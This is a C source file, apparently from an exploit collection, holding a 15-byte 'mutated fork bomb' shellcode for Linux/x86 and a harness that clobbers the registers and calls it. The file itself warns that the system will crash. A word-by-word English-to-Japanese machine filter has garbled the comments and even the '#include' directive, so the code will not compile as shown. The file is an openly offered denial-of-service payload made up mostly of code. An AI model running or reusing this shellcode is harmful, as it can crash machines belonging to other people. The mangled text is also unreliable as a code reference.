|
このページはEtoJ逐語翻訳フィルタによって翻訳生成されました。 |
/*
突然変異するd Fork 爆弾 Shellcode - C Language - Linux/x86
Copyright (C) 2013 Geyslan G. Bem, 切り開く/タクシー/不正アクセスing bits
http://hackingbits.com
geyslan@gmail.com
This program is 解放する/自由な ソフトウェア: you can redistribute it and/or 修正する
it under the 条件 of the GNU General Public License as published by
the 解放する/自由な ソフトウェア 創立/基礎, either 見解/翻訳/版 3 of the License, or
(at your 選択) any later 見解/翻訳/版.
This program is 分配するd in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the 暗示するd warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more 詳細(に述べる)s.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*
mutated_fork_bomb_shellcode
* 15 bytes
* null-解放する/自由な
* 突然変異するd isn't polymorphic (shellcode does not replicate itself to be called polymorphic)
# gcc -m32 -fno-stack-protector -z execstack mutated_fork_bomb_shellcode.c -o mutated_fork_bomb_shellcode
実験(する)ing
* Only run it in a 事実上の Machine!!! Your system will 衝突,墜落. Use at your own 危険!
*/
#含む <stdio.h>
#含む <string.h>
unsigned char shellcode[] = \
"\x31\xff\xeb\x01\xe8\xb2\x1d\x97\x83\xe8"
"\x1b\xcd\x80\xeb\xf1";
main ()
{
// When 含む/封じ込めるs null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %d\n", strlen(shellcode));
// 汚染するs all 登録(する)s 確実にするing that the shellcode runs in any circumstance.
__asm__ ("movl $0xffffffff, %eax\n\t"
"movl %eax, %ebx\n\t"
"movl %eax, %ecx\n\t"
"movl %eax, %edx\n\t"
"movl %eax, %esi\n\t"
"movl %eax, %edi\n\t"
"movl %eax, %ebp\n\t"
// Calling the shellcode
"call shellcode");
}